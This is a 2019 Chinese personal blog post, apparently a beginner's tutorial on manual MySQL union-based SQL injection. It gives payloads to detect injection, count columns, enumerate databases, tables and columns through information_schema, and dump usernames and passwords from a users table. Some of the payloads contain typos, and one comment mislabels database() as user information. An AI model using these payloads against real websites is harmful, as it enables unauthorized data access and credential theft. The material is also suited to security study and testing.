<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">






















<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=6.0.0" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=6.0.0">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=6.0.0">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=6.0.0">


  <link rel="mask-icon" href="/images/logo.svg?v=6.0.0" color="#222">





  <meta name="keywords" content="Hexo, NexT">










<meta name="description" content="在讲MySQL注入的之前，我们先来了解一下什么是sql。 1、什么是sqlSQL是一个通用的、功能强大的关系数据库语言，但其功能并不仅仅是 查询,它可以用来访问和操作数据库系统。SQL 语句用于取回和更新数 据库中的数据，同时，它也是一门标准的计算机语言。 2、什么是SQL注入所谓SQL注入，就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询 字符串，最终达到欺骗服务器执行恶意的S">
<meta property="og:type" content="article">
<meta property="og:title" content="mysql注入">
<meta property="og:url" content="http://liyusen.xyz/2019/06/01/mysql注入/index.html">
<meta property="og:site_name" content="简单的世界">
<meta property="og:description" content="在讲MySQL注入的之前，我们先来了解一下什么是sql。 1、什么是sqlSQL是一个通用的、功能强大的关系数据库语言，但其功能并不仅仅是 查询,它可以用来访问和操作数据库系统。SQL 语句用于取回和更新数 据库中的数据，同时，它也是一门标准的计算机语言。 2、什么是SQL注入所谓SQL注入，就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询 字符串，最终达到欺骗服务器执行恶意的S">
<meta property="og:locale" content="zh-Hans">
<meta property="og:updated_time" content="2019-06-02T09:00:53.319Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="mysql注入">
<meta name="twitter:description" content="在讲MySQL注入的之前，我们先来了解一下什么是sql。 1、什么是sqlSQL是一个通用的、功能强大的关系数据库语言，但其功能并不仅仅是 查询,它可以用来访问和操作数据库系统。SQL 语句用于取回和更新数 据库中的数据，同时，它也是一门标准的计算机语言。 2、什么是SQL注入所谓SQL注入，就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询 字符串，最终达到欺骗服务器执行恶意的S">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '6.0.0',
    sidebar: {"position":"right","display":"post","offset":12,"b2t":"ture","scrollpercent":false,"onmobile":false},
    fancybox: false,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://liyusen.xyz/2019/06/01/mysql注入/">





  <title>mysql注入 | 简单的世界</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

<script type="text/javascript" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js"></script>

  
  
    
  

  <div class="container sidebar-position-right page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"> <div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">简单的世界</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">小白</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/yuluo/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-schedule">
          <a href="/schedule/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-calendar"></i> <br>
            
            日程表
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://liyusen.xyz/2019/06/01/mysql注入/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="羽洛l">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/6.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="简单的世界">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">mysql注入</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-06-01T16:43:22+08:00">2019-06-01</time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <pre><code>在讲MySQL注入的之前，我们先来了解一下什么是sql。
</code></pre><h4 id="1、什么是sql"><a href="#1、什么是sql" class="headerlink" title="1、什么是sql"></a>1、什么是sql</h4><pre><code>SQL是一个通用的、功能强大的关系数据库语言，但其功能并不仅仅是
查询,它可以用来访问和操作数据库系统。SQL 语句用于取回和更新数
据库中的数据，同时，它也是一门标准的计算机语言。
</code></pre><h4 id="2、什么是SQL注入"><a href="#2、什么是SQL注入" class="headerlink" title="2、什么是SQL注入"></a>2、什么是SQL注入</h4><pre><code>所谓SQL注入，就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询
字符串，最终达到欺骗服务器执行恶意的SQL命令。简单来说，SQL注入就是一种通过
操作输入（可以是表单，可以是get请求，也可以是POST请求等）来插入或修改后台
SQL语句达到代码执行从而进行攻击的技术。
</code></pre><h4 id="3、SQL注入产生的原因"><a href="#3、SQL注入产生的原因" class="headerlink" title="3、SQL注入产生的原因"></a>3、SQL注入产生的原因</h4><pre><code>其主要原因就是当网页程序员在编写代码的时候，没有对用户输入数据的合法性进行
严格的判断和过滤，从而导致应用程序存在该漏洞
</code></pre><h4 id="4、攻击方法"><a href="#4、攻击方法" class="headerlink" title="4、攻击方法"></a>4、攻击方法</h4><pre><code>对于MySQL的注入主要有以下两种方法：

（1）手工注入
（2）使用工具注入
</code></pre><p>好了在基本介绍了MySQL之后，我们来进行实验。</p>
<p>首先，我们要确定该网站是否存在SQL注入,同时也要确定注入是字符型还是数字型</p>
<pre><code>1、常见的有如下：

    ？id=1    显示正常页面
    ？id=1&apos;    显示错误页面

2、也可以是:

    ? id=1 and 1=1    页面显示正常，因为1=1是正确的
    ？id=1 and 1=2    页面显示错误，因为1=2本来就是错误的，所以页面也就返回错误

数字型：and 1=1 and 1=2 判断是否存在注入
字符型：&apos; and &apos;1&apos;=&apos;1 &apos; and &apos;1&apos;=&apos;2
搜索型： 关键字%&apos; and 1=1 and &apos;%&apos;=&apos;% 关键字%&apos; and 1=2 and &apos;%&apos;=&apos;%
</code></pre><p>当我们基本上确定了网站存在注入的时候那么就可以进行下一步的操作了</p>
<h4 id="获取字段"><a href="#获取字段" class="headerlink" title="获取字段"></a>获取字段</h4><p>当我们确定了一个网站存在了基本的注入时，可以通过语句来获取字段</p>
<pre><code>and 1=1 order by n    通过不断改变n的值以及观察页面的情况来确定字段数

比如说n在5的时候出错了，那就说明select的字段是4个
</code></pre><h4 id="判断显示位"><a href="#判断显示位" class="headerlink" title="判断显示位"></a>判断显示位</h4><p>当我们得到n的值时，就可以用 union select来判断他的显示位</p>
<pre><code>and 1=2 union select 1,2,3,4,5,....,n #

注释常常使用    --+、#、%23
</code></pre><p>一般数字会显示在页面的任何位置，如何判断它呢，和正常页面作比较，如果正常页面没有而他又有说明他就是你要找的数字。</p>
<h4 id="查当前数据库"><a href="#查当前数据库" class="headerlink" title="查当前数据库"></a>查当前数据库</h4><pre><code>and 1=2 union select 1,2,3,SCHEMA_NAME from information_schema.schemata

and 1=2 union select 1,2,database()

当然databaes()也可以换其他的，如version()数据库的版本信息
而databaes()则是用户信息

获取数据库名
union select 1,2,SCHEMA_NAME, from information_schema.SCHEMATA limit 0,1   #得到第一个库名

union select 1,2,SCHEMA_NAME, from information_schema.SCHEMATA limit 1,1   #得到第二个库名
</code></pre><h4 id="查表名"><a href="#查表名" class="headerlink" title="查表名"></a>查表名</h4><p>当我们确定了数据库时就要获取数据库的表名，所以下一步就要获取它的表名</p>
<pre><code>and 1=2 union selec 1,2,3,table_name，5 from information_schema.tables where table_schema=batabaes()/*这里就是上面的数据库*/ limit 0,1

或者  union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #

查找所有表的语句：select table_name from information_schema.tables where table_schema=&apos;当前数据库&apos;
</code></pre><h4 id="查列名"><a href="#查列名" class="headerlink" title="查列名"></a>查列名</h4><pre><code>我们用information_schema.columns可以获取表中的所有字段

and 1=2 union select 1,2,3,column_name,5,6,7 from information_schema.columns where table_name=&apos;表名或者表名的十六进制&apos; limit 0,1

但是有的时候后台的代码可能仅用了使用where子句，那么这个时候就无法通过information_schema.coumns来得到列名了，这个时候只能够根据你自己多年的
黑客经验来进行猜解了。猜解的方法也是比较的简单，使用exists子句就可以进行猜解了。假设在我们已经知道了表名的情况下(当然猜解表名也使用通过exists子句来完成)

语句：id=1 and exists(select 猜测的列名 from users)
如果在users表中不存在就会报错或者不显示内容
如果存在机会返回结果，那就说明users表中存在列名
</code></pre><h4 id="查字段内容"><a href="#查字段内容" class="headerlink" title="查字段内容"></a>查字段内容</h4><pre><code>当我们得到表名和字段名后就可以dump数据库的所有信息了，比如，查询用户名，查询密码等等，当然我们还可以脱库，下载表中所有信息

and 1=2 union select 1,2,password from 表名    /*查询密码*/

and 1=2 union select 1,2,username from 表名    /*用户名*/
</code></pre><h4 id="脱库"><a href="#脱库" class="headerlink" title="脱库"></a>脱库</h4><pre><code>比如下载users的所有数据

and 1=2 union select 1,2,group_concat(username,password),4 from users(表名)
</code></pre><p>当然也可以得到其他的数据，不止用户名和密码。</p>
<p>以上就是一个sql注入的基本过程了，但是想要精通的活还需要不断的努力啊。</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/06/01/hello-world/" rel="next" title="Hello World">
                <i class="fa fa-chevron-left"></i> Hello World
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/6.jpg" alt="羽洛l">
            
              <p class="site-author-name" itemprop="name">羽洛l</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">4</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            

            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-4"><a class="nav-link" href="#1、什么是sql"><span class="nav-number">1.</span> <span class="nav-text">1、什么是sql</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#2、什么是SQL注入"><span class="nav-number">2.</span> <span class="nav-text">2、什么是SQL注入</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#3、SQL注入产生的原因"><span class="nav-number">3.</span> <span class="nav-text">3、SQL注入产生的原因</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#4、攻击方法"><span class="nav-number">4.</span> <span class="nav-text">4、攻击方法</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#获取字段"><span class="nav-number">5.</span> <span class="nav-text">获取字段</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#判断显示位"><span class="nav-number">6.</span> <span class="nav-text">判断显示位</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#查当前数据库"><span class="nav-number">7.</span> <span class="nav-text">查当前数据库</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#查表名"><span class="nav-number">8.</span> <span class="nav-text">查表名</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#查列名"><span class="nav-number">9.</span> <span class="nav-text">查列名</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#查字段内容"><span class="nav-number">10.</span> <span class="nav-text">查字段内容</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#脱库"><span class="nav-number">11.</span> <span class="nav-text">脱库</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      
        <div class="back-to-top">
          <i class="fa fa-arrow-up"></i>
          
        </div>
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">羽洛l</span>

  

  
</div>
<!--

  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/theme-next/hexo-theme-next">NexT.Muse</a> v6.0.0</div>

-->


        







        
      </div>
    </footer>

    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>














  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=6.0.0"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=6.0.0"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=6.0.0"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=6.0.0"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=6.0.0"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"log":false,"model":{"jsonPath":"/live2dw/assets/hibiki.model.json"},"display":{"position":"right","width":130,"height":423},"mobile":{"show":true}});</script></body>
</html>
<!-- 页面点击小红心 -->
<script type="text/javascript" src="/js/src/click.js"></script>
